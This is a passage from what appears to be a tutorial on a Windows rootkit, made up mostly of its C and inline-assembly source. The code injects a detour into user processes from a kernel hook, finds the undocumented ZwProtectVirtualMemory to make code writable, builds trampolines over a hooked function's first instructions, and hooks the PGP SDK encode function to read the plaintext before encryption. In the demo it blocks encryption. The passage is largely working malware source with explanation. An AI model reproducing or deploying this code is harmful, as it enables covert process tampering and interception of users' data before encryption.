                        mov edx, eax // pass it to DetourFunction in edx; the jmp below leaves edx untouched

                        pop eax // restore the eax value saved at the top

                        jmp DetourFunction // patched later: as compiled it targets DetourFunction in our own image, but it must target the copy of DetourFunction in the calling process

phoney_jump:

                        EMIT_FOUR( 0xff ) // a 32-bit -1 (0xFFFFFFFF) marker; processInject searches for it to find where the call data goes

                        EMIT_FOUR( 0x0 ) // the marker dword and these three dwords (16 bytes in total) are overwritten with the call data passed to processInject, which DetourFunction needs to adjust the stack

                        EMIT_FOUR( 0x0 )

                        EMIT_FOUR( 0x0 )

                        EMIT_FOUR( 0x90 ) // these nine dwords of no-ops (36 bytes) are overwritten with the saved first instruction(s) of the hooked function followed by a jmp back into it

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        jmp EndOfInjectedCode // later replaced by a no-op

            }

}
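The data area that starts at phoney_jump can be pictured as a small structure. The sketch below is an assumption drawn from the comments in the listing (index in the first 4 bytes, parameter count in the next 4, call type in bytes 8 to 12, stack offset in bytes 12 to 16, trampoline 16 bytes in); the real CALLDATA_* and TRAMPOLINE_LOCATION constants live in the rootkit headers, which are not shown here. hook_slot and find_marker are hypothetical names, and find_marker only illustrates the kind of search for the -1 marker that processInject performs later.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed layout of the bytes emitted after phoney_jump. */
typedef struct {
    uint32_t index;          /* hook index; holds 0xFFFFFFFF until patched */
    uint32_t parameters;     /* number of stack arguments of the hooked function */
    uint32_t call_type;      /* calling convention of the hooked function */
    uint32_t stack_offset;   /* extra stack adjustment */
    uint8_t  trampoline[36]; /* nine dwords of nops, later instruction(s) + jmp */
} hook_slot;

/* Return the offset of the first 0xFFFFFFFF dword in a table image, or -1. */
static long find_marker(const uint8_t *table, size_t length)
{
    size_t i;

    assert(table != NULL);
    for (i = 0; i + 4 <= length; i++) {
        uint32_t v;
        memcpy(&v, table + i, sizeof v);   /* read that is safe when unaligned */
        if (v == 0xFFFFFFFFu)
            return (long)i;
    }
    return -1;
}
```

Searching for a marker instead of hard-coding the offset means the code in front of phoney_jump can change size without breaking the patching step.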

 

__declspec(naked) tells the compiler to emit no prologue or epilogue for the function, so any stack-frame setup and cleanup has to be written by hand. As mentioned, HookTable is where the initialization for the real code takes place. It only calculates the run-time address of the parameters passed from the kernel (from our hooked kernel function) and then transfers control to DetourFunction (which is also where pCode points), where the real magic happens:

#define PUSH_STACKFRAME( ) __asm{ __asm push ebp __asm mov ebp, esp __asm sub esp, __LOCAL_SIZE __asm push edi __asm push esi __asm push ebx __asm pushfd } // naked functions get no compiler-generated prologue, so we write it ourselves

#define POP_STACKFRAME( ) __asm{ __asm popfd __asm pop ebx __asm pop esi __asm pop edi __asm mov esp, ebp __asm pop ebp } // the matching epilogue: after the final pop ebp, esp is back at the value it had on entry to the function

void __declspec(naked) DetourFunction( void ) // naked: the compiler emits no prologue or epilogue, so the stack on entry is exactly as the caller left it

{

            PUSH_STACKFRAME(); // the hand-written prologue: save ebp, copy esp to ebp, reserve the locals, then save edi, esi, ebx and the flags

            {

                        DWORD                      hookIndex;

                        DWORD                      parameters;

                        DWORD                      callType;

                        DWORD                      stackOffset;

                        PCHAR                        trampolineFunction;

                        IN_PROCESS_DATA*            callData;

                        PCHAR                        codeStart;

                        PDWORD                    originalStack;

                        DWORD                      tempStack;

                        int                                loop;

                        int                                parameters4return;

                        DWORD                      parameter2return = 0;

                        DWORD                      continueFlag;

                        DWORD                      register_esp;

                        DWORD                      register_edi;

                        DWORD                      register_esi;

                        DWORD                      register_eax;

                        DWORD                      register_ebx;

                        DWORD                      register_ecx;

                        DWORD                      add2stack;

 

                        // setup to call injected functions

                        __asm

                        {

                                    mov register_esp, esp // this and following lines save the register values

                                    mov register_edi, edi

                                    mov register_esi, esi

                                    mov register_eax, eax

                                    mov register_ebx, ebx

                                    mov register_ecx, ecx

 

                                    // get parameters

                                    push edx // save edx: it holds the address of phoney_jump, which is needed several times

                                    mov edx, [edx+CALLDATA_INDEX_LOCATION] // the hook index written by processInject; it occupies the first 4 bytes of the call data

                                    mov hookIndex, edx

                                    pop edx

                                    push edx

                                    mov edx, [edx+CALLDATA_PARAMETERS_LOCATION] // the number of parameters of the hooked function; the second 4 bytes

                                    mov parameters, edx

                                    pop edx

                                    push edx

                                    mov edx, [edx+CALLDATA_CALLTYPE_LOCATION] // the calling convention: CDECL_TYPE or another type

                                    mov callType, edx

                                    pop edx

                                    push edx

                                    mov edx, [edx+CALLDATA_STACK_OFFSET_LOCATION]

                                    mov stackOffset, edx

                                    pop edx

                                    push edx

                                    add edx, TRAMPOLINE_LOCATION // 16 bytes after phoney_jump: the first nop (opcode 0x90), where the trampoline is written

                                    mov trampolineFunction, edx

                                    pop edx

                                    // calculate the start address

                                    xor eax, eax // zeros the eax register

                                    call called_without_return // like call to phoney_call to get the address on top of the stack

called_without_return:

                                    pop eax // address of the called_without_return is now in eax

                                    lea ebx, DetourFunction

                                    lea ecx, called_without_return

                                    sub ecx, ebx

                                    sub eax, ecx // in fact now eax has the value (called_without_return real address) - (called_without_return - DetourFunction) which is Detour Function

                                    mov codeStart, eax //codeStart points to detour_function start

                                    // data area

                                    lea ecx, EndOfInjectedCode

                                    sub ecx, ebx // ecx contains EndOfInjectedCode - DetourFunction

                                    add ecx, eax //End of EndOfInjectedCode address

                                    mov callData, ecx // callData now contains address of IN_PROCESS_DATA (In allocateUserMemory we allocated IN_PROCESS_DATA after HookTable(tableSize) and Detour Function(codeSize))

                                    // calculate the last ret address

                                    mov eax, ebp // ebp by PUSH_STACKFRAME macro got the original esp - 4 (subtracted by 4 because the ebp before storing esp was pushed)

                                    add eax, 4        // adding 4 means in fact pop (because x86 stack grows down) and now eax has the original esp

                                    add eax, stackOffset

                                    mov originalStack, eax // will be used to read parameters

                        }

 

                        // setup return call type

                        if( callType == CDECL_TYPE )

                                    add2stack = parameters * sizeof( DWORD ); // cdecl: the caller removes the arguments, so we must pop the copies we push below

                        else

                                    add2stack = 0; // otherwise the original function removes its own arguments when it returns

                        // call pre-injected code

                        continueFlag = BeforeOriginalFunction( hookIndex, originalStack, &parameter2return, callData ); // dispatches on hookIndex to the matching pre-hook, in this case beforeEncode

                        if( continueFlag == (DWORD)TRUE ) // TRUE: go on and run the original hooked function; FALSE: skip it and return parameter2return to the caller

                        {

                                    for( loop = parameters; loop > 0; loop-- ) // push fresh copies of the arguments, last one first; originalStack[0] is the return address, so the arguments are originalStack[1] to originalStack[parameters]

                                    {

                                                tempStack = originalStack[loop];

                                                __asm push tempStack

                                    }

                                    // Call trampoline (jumps to original function)

                                    //

                                    // Since trampoline is a jump, the return in

                                    // the original function will come back here.

                                    __asm

                                    {

                                                lea ebx, DetourFunction

                                                lea eax, return_from_trampoline

                                                sub eax, ebx

                                                add eax, codeStart // eax = run-time address of return_from_trampoline in the injected copy

                                                // construct call

                                                push eax

                                                // adjust stack

                                                sub esp, stackOffset // changes nothing in this example, where stackOffset is 0

                                                // restore registers and call

                                                mov edi, register_edi

                                                mov esi, register_esi

                                                mov eax, register_eax

                                                mov ebx, register_ebx

                                                mov ecx, register_ecx

                                                jmp trampolineFunction // run the saved first instruction, which is followed by a jmp into the rest of the hooked function; when that function returns it lands on the next line, whose address we pushed above

return_from_trampoline:

                                                add esp, add2stack // pop the argument copies we pushed (add2stack is 0 unless the call type is cdecl)

                                                mov parameter2return, eax //return value in parameter2return

                                    }

                                    // call post-injected code

                                    AfterOriginalFunction( hookIndex, originalStack, &parameter2return, callData ); //Do nothing for now, just to show the concept

                        }

                        // prepare to return

                        tempStack = *originalStack;

                        if( callType == CDECL_TYPE )

                                    parameters4return = 0; // cdecl: our caller removes the arguments itself

                        else

                                    parameters4return = parameters; // otherwise we stand in for the callee and must remove the arguments before returning

                        __asm

                        {

                                    mov eax, parameter2return

                                    mov ecx, tempStack // the top of the original stack holds the return address into the caller, so ecx now contains that return address

                                    mov edx, parameters4return

                                    shl edx, 2 // multiply by 4, size of a DWORD

                                    add edx, stackOffset

                                    POP_STACKFRAME(); // original stack

                                    add esp, 4 // discard the return address

                                    add esp, edx // discard the arguments as well when the callee must clean the stack ( !CDECL_TYPE )

                                    jmp ecx // jump to return address

                        }

                        __asm mov edx, trampolineFunction // never reached: the jmp ecx above does not fall through

            }

            POP_STACKFRAME(); // never reached (leftover code)

            __asm jmp edx // never reached (leftover code)

}

 

What we do must not disturb the code that runs afterwards, so we first save the registers and later restore them; that is the job of PUSH_STACKFRAME and the register_* variables at the top of DetourFunction. In the block marked "get parameters" we read the values passed from the kernel, using the address that HookTable left in edx. At the end of that block we also store in the trampolineFunction variable the address we must jump to in order to run the original function. While our custom code runs we may need the parameters of the original hooked function. They are on top of the stack, and we can reach them because control arrives in the detour through a jmp rather than a call, so the stack is unchanged. In the rest of the first __asm block we set callData, which holds the pointers to the library functions, and point originalStack at the original stack. We then run our custom code ahead of the hooked function by calling BeforeOriginalFunction. To run code after the original function we do much the same as a buffer overflow exploit does: we place a return address on the stack that points to our post-hook code. That is the push eax that follows the computation of the address of return_from_trampoline. We then jump to the address saved in trampolineFunction, which holds the first instruction of the hooked function followed by a jump back into that function. When the original function returns, control arrives at return_from_trampoline, where, depending on the calling convention, we clean the stack, put the return value where the caller expects it, and so on.
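The stack bookkeeping in DetourFunction comes down to two small calculations, restated here in portable C as a sketch. The enum and function names are hypothetical; the arithmetic mirrors add2stack and the final add esp, 4 / add esp, edx sequence in the listing.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical names: the listing only distinguishes CDECL_TYPE from
   everything else. */
enum call_type { CALL_CDECL, CALL_CALLEE_CLEANS };

/* Bytes the detour pops right after the original function returns to it
   (add2stack in the listing). */
static uint32_t bytes_after_trampoline(enum call_type t, uint32_t parameters)
{
    assert(parameters <= 0x0FFFFFFFu);   /* keep parameters * 4 from wrapping */
    return t == CALL_CDECL ? parameters * 4u : 0u;
}

/* Bytes the detour removes from the original stack before jumping back to
   its caller: the return address, the arguments when the callee must clean
   them, and stackOffset. */
static uint32_t bytes_on_return(enum call_type t, uint32_t parameters,
                                uint32_t stack_offset)
{
    uint32_t args;

    assert(parameters <= 0x0FFFFFFFu);
    args = (t == CALL_CDECL) ? 0u : parameters * 4u;
    return 4u + args + stack_offset;
}
```

For a two-parameter cdecl function the detour pops 8 bytes after the trampoline call and 4 bytes on return; for a callee-cleans function it pops nothing after the call and 12 bytes on return.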

The execution flow after hooking the desired function is as in figure 4:

Rootkit source code execution flow 

Figure 4

In your injected code you can do almost anything, as long as the library and API functions you need are made available in the process's memory. Here, in BeforeOriginalFunction, we process the buffer before encryption and return a value that decides whether the original hooked function runs or not:

///////////////////////////////////////////////////////////////

DWORD BeforeOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData )

{

                if( hookIndex == USERHOOK_beforeEncode )

                {

                                return beforeEncode( originalStack, returnParameter, callData );

                }

                // other hooks can be handled here

                return (DWORD)TRUE;

}

 

// this function is located in the PGP SDK

// dynamic link library (old=PGP_SDK.DLL, new=PGPsdk.dll)

// This function accepts the callers input and output,

// which may be memory or file based, and converts the input

// into encrypted output

//

// return TRUE to allow encryption

// return FALSE to block encryption

///////////////////////////////////////////////////////////////

DWORD beforeEncode( PDWORD stack, DWORD* callbackReturn, IN_PROCESS_DATA* pCallData )

{

                void*                                                                     contextPtr = (void*)stack[1]; // stack[0] is return address so the stack[1] is first parameter

                PGPOptionList*                                                optionListPtr = (PGPOptionList*)stack[2]; // second parameter of original Encode function

                DWORD                                                                                dwRet = (DWORD)TRUE;

 

                int index;

                int inputType = 0;

                void* lpBuffer;

                DWORD dwInBufferLen = 0;

                PGPOption* currentOption = optionListPtr->options;

                PFLFileSpec* fileSpec;

 

                // Look at the options in the option list

                for( index = 0; index < optionListPtr->numOptions; index++)

                {

                                if( currentOption->type == 1 )

                                {

                                                // File Input

                                                inputType = 1;

                                                fileSpec = (PFLFileSpec*)currentOption->value;

                                                lpBuffer = fileSpec->data;

                                                dwInBufferLen = (DWORD)pCallData->plstrlenA((LPCSTR)(lpBuffer)); // pCallData is the IN_PROCESS_DATA structure handed over by the detour; processInject filled in its function pointers in the data section

                                                break;

                                }

                                else if( currentOption->type == 2 )

                                {

                                                // Buffer Input

                                                inputType = 2;

                                                lpBuffer = (void*)currentOption->value;

                                                dwInBufferLen = (DWORD)currentOption->valueSize;

                                                break;

                                }

                                currentOption++;

                }

 

                // Process buffer or file before encryption -- for now do nothing --

                if(( inputType == 1 || inputType == 2 ) && ( dwInBufferLen > 0 ))

                {                                             

                                // just blocking this API to show functionality

                                dwRet = (DWORD)FALSE;

                                *callbackReturn = PGP_BAD_API;

                }

                return dwRet;

}

 

AfterOriginalFunction does nothing; it is only there to show that you can run code after the hooked function:

void AfterOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData )

{

}

 

Now that you understand what happens once the hook is in place, it is time to see how we place it. We need to:

  • Copy our custom code (HookTable, the pointers to the library functions, DetourFunction and so on) to the process's memory
  • Overwrite the first instruction of the hooked function with a jmp opcode followed by the location of our injected code in the process's memory
  • Copy that first instruction into the HookTable and place after it a jump back to the second instruction of the original hooked function
  • Copy the parameters passed from the hooked ZwMapViewOfSection to the HookTable

Copying the first instruction may seem simple, but it is not. To understand why, you need to be familiar with the x86 instruction set. Instructions do not all have the same length, and depending on the opcode you must also copy the bytes that follow it (for example the source and destination operands of a mov instruction). I skip the details of the transferInstruction function, which does the low-level work; if you are interested, you can download the source code from the address mentioned earlier and look at the file Parse86.h. For now, here is just the high-level function getx86Instruction:

ULONG getx86Instruction( PCHAR originalCode, PCHAR instructionBuffer, ULONG bufferLength ) // copies whole instructions from the start of the function until at least 5 bytes are covered and returns the number of bytes copied

{

                PBYTE source = NULL;

                PBYTE destination = NULL;

                ULONG ulCopied = 0;

                PBYTE jumpAddress = NULL;

                LONG  extra = 0;

 

                memset( instructionBuffer, 0, bufferLength );

                source = (PBYTE)originalCode;

                destination = (PBYTE)instructionBuffer;

                jumpAddress = NULL;

                extra = 0;

                // start with 5 bytes

                for( ulCopied = 0; ulCopied < 5; ) // 5 because the jmp that will overwrite these bytes is 5 bytes long; covering them may take more than one instruction

                {

                                source = transferInstruction( destination, source, &jumpAddress, &extra ); // decodes the opcode at source, copies one whole instruction to destination and returns source advanced past it; jumpAddress and extra are filled in for jumps but are not used here

                                if( !source )

                                {

                                                memset( instructionBuffer, 0, bufferLength );

                                                ulCopied = 0;

                                                break;

                                }

                                ulCopied = (DWORD)source - (DWORD)originalCode; // bytes consumed so far; the loop stops at the first instruction boundary at or beyond 5 bytes

                                if( ulCopied >= bufferLength )

                                {

                                                ASSERT( FALSE );

                                                break;

                                }

                                destination = (PBYTE)instructionBuffer + ulCopied;

                }

                return ulCopied;

}
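To make the "whole instructions, at least 5 bytes" rule concrete, here is a toy version in portable C. It is a sketch under heavy assumptions: insn_length is a hypothetical stand-in for transferInstruction that recognises only a handful of 32-bit encodings often seen in function prologues and gives up on everything else, whereas the real decoder in Parse86.h handles the full instruction set.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy length decoder for a few 32-bit x86 encodings; returns 0 if the
   instruction is not recognised. Not a real disassembler. */
static size_t insn_length(const uint8_t *p, size_t avail)
{
    uint8_t op;

    if (avail == 0) return 0;
    op = p[0];
    if (op == 0x90) return 1;                     /* nop */
    if (op >= 0x50 && op <= 0x5F) return 1;       /* push r32 / pop r32 */
    if (op == 0x6A) return 2;                     /* push imm8 */
    if (op == 0x68) return 5;                     /* push imm32 */
    if (op >= 0xB8 && op <= 0xBF) return 5;       /* mov r32, imm32 */
    if (avail >= 2 && (p[1] & 0xC0) == 0xC0) {    /* register-direct ModRM */
        if (op == 0x89 || op == 0x8B) return 2;   /* mov reg, reg */
        if (op == 0x83) return 3;                 /* add/sub/... reg, imm8 */
    }
    return 0;
}

/* Copy whole instructions from code to out until at least `need` bytes are
   covered. Returns the number of bytes copied, or 0 on failure. */
static size_t copy_prologue(const uint8_t *code, size_t code_len,
                            uint8_t *out, size_t out_len, size_t need)
{
    size_t copied = 0;

    assert(code != NULL && out != NULL);
    while (copied < need) {
        size_t n = insn_length(code + copied, code_len - copied);
        if (n == 0 || n > code_len - copied || n > out_len - copied)
            return 0;                             /* unknown or does not fit */
        memcpy(out + copied, code + copied, n);
        copied += n;
    }
    return copied;
}
```

For the prologue 55 8B EC 83 EC 10 (push ebp; mov ebp, esp; sub esp, 10h) the first two instructions cover only 3 bytes, so the third is copied too and 6 bytes end up in the trampoline.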

 

Changing the first instruction of the original function is not easy either, because the memory that holds it is write-protected. We have to call the undocumented kernel function ZwProtectVirtualMemory, which changes the protection of a range of memory, to make it writable. Starting from the documented function ZwPulseEvent, we search for ZwProtectVirtualMemory and then use it to make the original function writable:

ZwProtectVirtualMemory(

  IN HANDLE               ProcessHandle,

  IN OUT PVOID            *BaseAddress,

  IN OUT PULONG           NumberOfBytesToProtect,

  IN ULONG                NewAccessProtection,

  OUT PULONG              OldAccessProtection );

ZWPROTECTVIRTUALMEMORY OldZwProtectVirtualMemory;

…

OldZwProtectVirtualMemory = findUnresolved(ZwPulseEvent);

…

PVOID findUnresolved( PVOID pFunc )

{

                UCHAR pattern[5] = { 0 };

                PUCHAR               bytePtr = NULL;

                PULONG  oldStart = 0;

                ULONG newStart = 0;

 

                memcpy( pattern, pFunc, 5 ); // copy first 5 bytes of function ZwPulseEvent

 

                // subtract offset

                oldStart = (PULONG)&(pattern[1]);

                newStart = *oldStart - 1; // subtract 1 from the 32-bit value held in bytes 1 to 4 of the pattern (the code assumes that ZwProtectVirtualMemory starts with the same 5 bytes as ZwPulseEvent except that this value is one lower)

                *oldStart = newStart;

 

                // Search for pattern

                for( bytePtr = (PUCHAR)pFunc - 5; bytePtr >= (PUCHAR)pFunc - 0x800; bytePtr-- ) // search backward from ZwPulseEvent, up to 2 KB (0x800 bytes) before it

                                if( checkPattern( bytePtr, pattern, 5 ) == 0 ) // compares the 5 bytes at bytePtr with the pattern; because bytePtr moves back one byte at a time, every 5-byte window in that range is tested

                                                return (PVOID)bytePtr;

                // pattern not found

                return NULL;

}
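The same search can be tried out on an ordinary byte buffer. The sketch below is a portable restatement of findUnresolved, with assumptions stated plainly: find_previous_stub is a hypothetical name, the buffer stands in for the kernel image, and the stubs are assumed to start with the 5-byte encoding B8 imm32 (mov eax, imm32), whose immediate is read as a little-endian 32-bit value.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Search backwards from offset `known` for a 5-byte pattern equal to the
   bytes at `known`, except that the 32-bit little-endian value in bytes 1..4
   is one lower. Returns the offset found, or -1 if nothing matches within
   `window` bytes before `known`. */
static long find_previous_stub(const uint8_t *image, size_t image_len,
                               size_t known, size_t window)
{
    uint8_t  pattern[5];
    uint32_t imm;
    size_t   off;

    assert(image != NULL && known + 5 <= image_len);
    memcpy(pattern, image + known, 5);
    imm = (uint32_t)pattern[1] | ((uint32_t)pattern[2] << 8) |
          ((uint32_t)pattern[3] << 16) | ((uint32_t)pattern[4] << 24);
    imm -= 1u;                               /* the value we are looking for */
    pattern[1] = (uint8_t)imm;
    pattern[2] = (uint8_t)(imm >> 8);
    pattern[3] = (uint8_t)(imm >> 16);
    pattern[4] = (uint8_t)(imm >> 24);

    if (known < 5) return -1;
    off = known - 5;
    for (;;) {
        if (known - off > window) break;     /* outside the search window */
        if (memcmp(image + off, pattern, 5) == 0) return (long)off;
        if (off == 0) break;                 /* reached the start of the buffer */
        off--;
    }
    return -1;
}
```

A match on 5 bytes is a heuristic, not a proof, so a result should be treated with care; the original code likewise returns NULL when nothing is found and leaves the check to its caller.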

BOOL makeWritable( PVOID address, ULONG size )

{

    NTSTATUS       status;

                ULONG                 pageAccess;

                ULONG                 ZwProtectArray[3] = { 0 };

 

                pageAccess = PAGE_EXECUTE_READWRITE;

                ZwProtectArray[0] = (ULONG)address; // address of the region to make writable; we need this because we tamper with both the hooked function and the HookTable

                ZwProtectArray[1] = size;

                ZwProtectArray[2] = 0;

 

                status = OldZwProtectVirtualMemory( (HANDLE)-1, // (HANDLE)-1 is the current-process pseudo-handle; the function is not exported, but we found its address in memory and declared its prototype, so we can call it

                                (PVOID *)(&(ZwProtectArray[0])), // in/out: base address of the region

                                &(ZwProtectArray[1]), // in/out: size of the region in bytes

                                pageAccess, // PAGE_EXECUTE_READWRITE

                                &(ZwProtectArray[2]) ); // out: receives the previous protection

 

                if( !NT_SUCCESS( status ) )

                                return FALSE;

 

                return TRUE;

}

 

Now that we have all the tools we need, see the processInject code:

BOOL processInject( CALL_DATA_STRUCT* pCallData, int hooks, PCHAR pMemory )

{

                int           loop;

                int           offsetToPattern;

                PCHAR pNewTable;

                PCHAR pNewCode;

                IN_PROCESS_DATA* pNewData;

                PCHAR pOldTable;

                PCHAR pOldCode;

                PCHAR pOldData;

                DWORD tableLength;

                DWORD tableOffset;

                PCHAR callDataOffset;

 

                if( !kernel32Base )

                                return FALSE;

 

                if( !getHookPointers( pMemory, &pNewTable, &pNewCode, (PCHAR*)&pNewData ) )

                                return FALSE;

// To call the library functions we need, we must look up their addresses, because the injected code cannot assume they are already resolved in the caller process. We use GetFunctionAddress (we are still in the code that sets up the hook, so this and our other functions are available) to locate the library functions and store their addresses in the IN_PROCESS_DATA structure

                pNewData->pOutputDebugStringA = (PROTOTYPE_OutputDebugStringA)GetFunctionAddress( kernel32Base, "OutputDebugStringA", NULL, 0 );

                pNewData->pOutputDebugStringW = (PROTOTYPE_OutputDebugStringW)GetFunctionAddress( kernel32Base, "OutputDebugStringW", NULL, 0 );

                pNewData->pCloseHandle = (PROTOTYPE_CloseHandle)GetFunctionAddress( kernel32Base, "CloseHandle", NULL, 0 );

                pNewData->pSleep = (PROTOTYPE_Sleep)GetFunctionAddress( kernel32Base, "Sleep", NULL, 0 );

                pNewData->pCreateFileW = (PROTOTYPE_CreateFileW)GetFunctionAddress( kernel32Base, "CreateFileW", NULL, 0 );

                pNewData->plstrlenA = (PROTOTYPE_lstrlenA)GetFunctionAddress( kernel32Base, "lstrlenA", NULL, 0 );

                pNewData->plstrlenW = (PROTOTYPE_lstrlenW)GetFunctionAddress( kernel32Base, "lstrlenW", NULL, 0 );

                pNewData->plstrcpynA = (PROTOTYPE_lstrcpynA)GetFunctionAddress( kernel32Base, "lstrcpynA", NULL, 0 );

                pNewData->plstrcpynW = (PROTOTYPE_lstrcpynW)GetFunctionAddress( kernel32Base, "lstrcpynW", NULL, 0 );

                pNewData->plstrcpyA = (PROTOTYPE_lstrcpyA)GetFunctionAddress( kernel32Base, "lstrcpyA", NULL, 0 );

                pNewData->plstrcpyW = (PROTOTYPE_lstrcpyW)GetFunctionAddress( kernel32Base, "lstrcpyW", NULL, 0 );

                pNewData->plstrcmpiA = (PROTOTYPE_lstrcmpiA)GetFunctionAddress( kernel32Base, "lstrcmpiA", NULL, 0 );

                pNewData->plstrcmpiW = (PROTOTYPE_lstrcmpiW)GetFunctionAddress( kernel32Base, "lstrcmpiW", NULL, 0 );

                pNewData->plstrcmpA = (PROTOTYPE_lstrcmpA)GetFunctionAddress( kernel32Base, "lstrcmpA", NULL, 0 );

                pNewData->plstrcmpW = (PROTOTYPE_lstrcmpW)GetFunctionAddress( kernel32Base, "lstrcmpW", NULL, 0 );

                pNewData->plstrcatA = (PROTOTYPE_lstrcatA)GetFunctionAddress( kernel32Base, "lstrcatA", NULL, 0 );

                pNewData->plstrcatW = (PROTOTYPE_lstrcatW)GetFunctionAddress( kernel32Base, "lstrcatW", NULL, 0 );

                sprintf( pNewData->debugString, "This is a string contained in injected memory\n" );

 

                __asm

                {

                                lea eax, HookTable

                                mov pOldTable, eax

                                lea eax, DetourFunction

                                mov pOldCode, eax

                                lea eax, EndOfInjectedCode

                                mov pOldData, eax

                }

 

                memcpy( pNewCode, pOldCode, pOldData - pOldCode ); // write the detour function into the code section of the memory allocated in the process space

                tableLength = pOldCode - pOldTable;

                for( loop = 0; loop < (int)tableLength - 4; loop ++ )

                {

                                if( *(PDWORD)(pOldTable+loop) == (DWORD)START_OF_TRAMPOLINE_PATTERN ) // search for the -1 marker, which is the first dword at phoney_jump in HookTable

                                {

                                                offsetToPattern = loop; // offset to phoney_jump

                                                break;

                                }

                }

                for( loop = 0; loop < hooks; loop ++ ) // for now it is just one hook, but as you can see this function can place several hooks for different functions

                {

                                tableOffset = tableLength * pCallData[loop].index; // according to potential of several hooks, it calculates table of current hook. for now it is just one table and actually is 0

                                callDataOffset =  pNewTable + tableOffset + offsetToPattern; //address of phoney_jump

                                memcpy( pNewTable + tableOffset, pOldTable, tableLength ); // write HookTable in table section of memory allocated in the process space

                                *((PDWORD)(callDataOffset + CALLDATA_INDEX_LOCATION)) = pCallData[loop].index; // first 4 bytes (over the -1 marker): the index of the hook, for example USERHOOK_beforeEncode

                                *((PDWORD)(callDataOffset + CALLDATA_PARAMETERS_LOCATION)) = pCallData[loop].parameters; // second 4 bytes (4 bytes after phoney_jump): the number of parameters of the original function

                                *((PDWORD)(callDataOffset + CALLDATA_CALLTYPE_LOCATION)) = pCallData[loop].callType; // bytes 8 to 12: the call type, such as CDECL_TYPE

                                *((PDWORD)(callDataOffset + CALLDATA_STACK_OFFSET_LOCATION)) = pCallData[loop].stackOffset; // bytes 12 to 16: the stack offset

                                INJECT_JUMP( callDataOffset + JUMP_TO_DETOUR_LOCATION, pNewCode ); // patch the jmp DetourFunction instruction that precedes the -1 in HookTable so that it points to the CALLER PROCESS's copy of the detour function (which was just copied). Note: the jmp instruction is 5 bytes long

                                createTrampoline( pCallData[loop].hookFunction, // address of hooked function

                                                pNewTable + tableOffset, //Beginning of HookTable

                                                callDataOffset + TRAMPOLINE_LOCATION); // actually in first no-op of HookTable

                }

                return TRUE;

}

// Parse first instruction of original function.

// Replace first instruction with jump to hook.

// Save first instruction to trampoline function.

// Only call original function through trampoline.

BOOL isJump( PCHAR instruction, ULONG instructionLength )

{

                BYTE firstByte;

                BYTE secondByte;

                PCHAR thisInstruction;

                ULONG thisInstructionLength;

                ULONG nextInstructionLength;

                char instructionBuffer[MAX_INSTRUCTION] = { 0 };

 

                thisInstruction = instruction;

                thisInstructionLength = instructionLength;

                while( thisInstructionLength > 0 ) // because of the 5-byte limit in getx86Instruction, the buffer may hold more than one instruction

                {

                                // check all jump op codes

                                firstByte = thisInstruction[0];

                                secondByte = thisInstruction[1];

                                if( IS_BETWEEN( firstByte, 0x70, 0x7f ) ) // this check and the ones that follow cover all types of jump

                                                return TRUE;

                                else if( IS_BETWEEN( firstByte, 0xca, 0xcb ) )

                                                return TRUE;

                                else if( IS_BETWEEN( firstByte, 0xe0, 0xe3 ) )

                                                return TRUE;

                                else if( IS_BETWEEN( firstByte, 0xe8, 0xeb ) )

                                                return TRUE;

                                else if( IS_EQUAL( firstByte, 0xcf ) )

                                                return TRUE;

                                else if( IS_EQUAL( firstByte, 0xf3 ) )

                                                return TRUE;

                                else if( IS_EQUAL( firstByte, 0xff ) )

                                {

                                                if( secondByte == 0x15 || secondByte == 0x25 )

                                                                return TRUE;

                                                if( (secondByte & 0x38) == 0x10 || (secondByte & 0x38) == 0x18 ||

                                                                (secondByte & 0x38) == 0x20 || (secondByte & 0x38) == 0x28 )

                                                                return TRUE;

                                }

                                else if( IS_EQUAL( firstByte, 0x0f ) )

                                {

                                                if( IS_BETWEEN( secondByte, 0x80, 0x8f ) )

                                                                return TRUE;

                                }

                                memset( instructionBuffer, 0, sizeof(instructionBuffer) );

                                nextInstructionLength = getNextInstruction( thisInstruction, 1, instructionBuffer, MAX_INSTRUCTION );

                                if( nextInstructionLength <= 0 )

                                                break;

                                thisInstructionLength -= nextInstructionLength;

                                thisInstruction += nextInstructionLength;

                }

                return FALSE;

}

#define INJECT_JUMP( from, to ) { ((PCHAR)(from))[0] = (CHAR)0xe9; *((DWORD *)&(((PCHAR)(from))[1])) = (DWORD)((PCHAR)(to) - (PCHAR)(from) - 5); } // the - 5 accounts for the size of the jmp instruction (read it as to - (from + 5)): the displacement of a jmp is counted from the byte after the instruction itself

BOOL createTrampoline( PCHAR originalAddress, PCHAR tableAddress, PCHAR trampolineAddress )

{

                ULONG                 newOriginalAddress = 0;

                char                       instruction[MAX_INSTRUCTION] = { 0 }; //MAX_INSTRUCTION is 36

                ULONG                 instructionLength;

 

                instructionLength = getx86Instruction( originalAddress, instruction, sizeof(instruction) );

                newOriginalAddress = (ULONG)(originalAddress + instructionLength);

                // see if it's a jump

                if( isJump( instruction, instructionLength ) ) //here all types of jump will be examined

                {

                                PVOID pOldDstAddr = (PVOID)(GET_JUMP( instruction )); // only a 0xe9 jump is accepted here; for any other jump 0 is returned and createTrampoline returns FALSE, since cases such as call cannot be handled in our detour function

                                if( pOldDstAddr )

                                {

                                                // If first instruction of original function

                                                // is a jump, trampoline instruction is NO-OP

                                                // and jump target is original jump target

                                                memset( instruction, 0x90, sizeof(instruction) );

                                                instructionLength = 0;

                                                newOriginalAddress = (ULONG)pOldDstAddr; // keep track of the jump target so we can return to it (after executing the first instruction and doing our evil things)

                                }

                                else

                                {

                                                return FALSE;

                                }

                } // at this point two things are done: first, we have the instruction (the instruction variable) to place at the phoney_call location in HookTable (either the first instruction of the original function or no-ops); second, we have the address (the newOriginalAddress variable) to return to after our beforeEncode function (either the address after the first instruction or, for a jump, the jump's target)

